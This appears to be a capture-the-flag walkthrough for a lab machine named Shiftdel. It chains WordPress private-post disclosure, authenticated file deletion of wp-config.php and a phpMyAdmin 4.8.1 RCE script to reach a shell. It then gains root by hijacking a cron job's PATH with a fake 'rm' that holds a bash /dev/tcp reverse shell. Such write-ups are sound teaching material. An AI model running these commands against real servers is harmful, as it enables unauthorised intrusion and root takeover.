Shiftdel

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 4000 192.168.197.174
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 21:06 +08
Nmap scan report for 192.168.197.174
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8888/tcp open  sun-answerbook

Just 2 ports on the website.

Web Enumeration -> WP Creds

Port 80 shows a Wordpress site:

Port 8888 on the other hand shows a phpMyAdmin instance:

When we view the page source of port 8888, there is indication of the version running:

This version is vulnerable to an RCE exploit that requires credentials, which we'll keep in mind for now:

$ searchsploit phpmyadmin 4.8.1
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1 | php/webapps/44924.txt
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2 | php/webapps/44928.txt
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)             | php/webapps/50457.py
----------------------------------------------------------- ---------------------------------

Default credentials don't work with this site. Since there was a Wordpress site available, we can use wpscan for some basic enumeration. There was loads of output, but I found this one vulnerability to be the most interesting for now.

$ wpscan --api-token <TOKEN> --url http://192.168.197.174/ --enumerate u,t,p
<TRUNCATED>
[+] WordPress version 4.9.6 identified (Insecure, released on 2018-05-17).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.197.174/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.6'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.197.174/, Match: 'WordPress 4.9.6'
 <TRUNCATED>
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 <TRUNCATED>

The rest of the exploits required some form of credentials to exploit, except for this one. To make this work, we just need to visit this site:

http://192.168.197.174/?static=1&order=asc

The web page then reveals some credentials:

We seem to be an intern at Shiftdel, and it coincides with wpscan returning intern as a valid user:

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] intern
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

With these credentials, we can login to the dashboard and begin checking out the other vulnerabilities:

Arbitrary File Deletion -> RCE

wpscan revealed many different types of exploits, including an authenticated RCE. However, since we aren't the administrator of Wordpress, it's unlikely that we can directly get RCE through WP. So, I turned my attention towards exploiting phpMyAdmin.

Out of all the exploits that are available, it seemed that the Arbitrary File Delete works:

[!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.9.7
 |     References:
 |      - https://wpscan.com/vulnerability/42ab2bd9-bbb1-4f25-a632-1811c5130bb4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/e3ef8976-11cb-4854-837f-786f43cbdf44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 
$ searchsploit wordpress file deletion 4.9.6
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated)  | php/webapps/50456.js
WordPress Core < 4.9.6 - (Authenticated) Arbitrary File De | php/webapps/44949.txt
----------------------------------------------------------- ---------------------------------

When run on the localhost, it causes the Wordpress instance to start crashing since wp-config.php no longer exists and the website cannot do anything without it. Searching more about this file deletion led me to this blog:

WordPress File Delete to Code ExecutionSonarSource

To exploit this, we can use the instructions given in the JS file. This involves using the Developer Console and pasting some code within it. Afterwards, we can just execute the function as required:

Once deleted, this kind of breaks the entire website. It just returns source code:

Using this, we can view the wp-config.php file since the website is no longer executing PHP:

$ curl http://192.168.197.174/wp-config.php      
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'wordpress');

/** MySQL database password */
define('DB_PASSWORD', 'ThinnerATheWaistline348');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
<TRUNCATED>

Using this password, we can achieve RCE on phpMyAdmin:

$ python3 50457.py 192.168.197.174 8888 / wordpress ThinnerATheWaistline348 id    
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can then get a reverse shell:

Grab the user flag.

Privilege Escalation

Path Hijack -> Root Shell

I ran a linpeas.sh scan and it found this:

[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs          
/usr/bin/crontab                                                                             
incrontab Not Found
-rw-r--r-- 1 root root 1042 Oct 11  2019 /etc/crontab                                        

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Oct 25  2021 .
drwxr-xr-x 77 root root 4096 Dec 13  2021 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
-rw-r--r--  1 root root  712 Dec 17  2018 php
-rw-r--r--  1 root root  348 Oct 25  2021 wpclean

There's a wpclean thing running periodically on the machine. Here's the contents of that script:

# /etc/cron.d/wpclean: crontab entries to cleanup wordpress uploads folder

HOME=/var/www/html/wordpress/wp-content/uploads
PATH=~/bin:/usr/bin:/bin

# in case the intern do something silly, delete all files with invalid image extension
*/5 * * * * root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpeg\|png\|gif\)' -exec bash -c "rm -f {}" \;

First thing I noticed was that this was using a custom HOME variable, which is included in the PATH variable as the first directory and the fact that www-data can write to their HOME directory. The rm binary they execute here does not have the full path, so we can create our own rm file that gives a reverse shell when executed.

Here's the contents of my reverse shell:

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.45.177/4444 0>&1'
## need to specify full paths!

Run these commands:

cd /var/www/html/wordpress/wp-content/uploads
mkdir bin
cd bin
wget <IP>/rm
chmod +x rm

Then, set up a listener port and wait for a few minutes. Eventually, we'll get a root shell:

PreviousSirol NextShifty

Last updated 1 year ago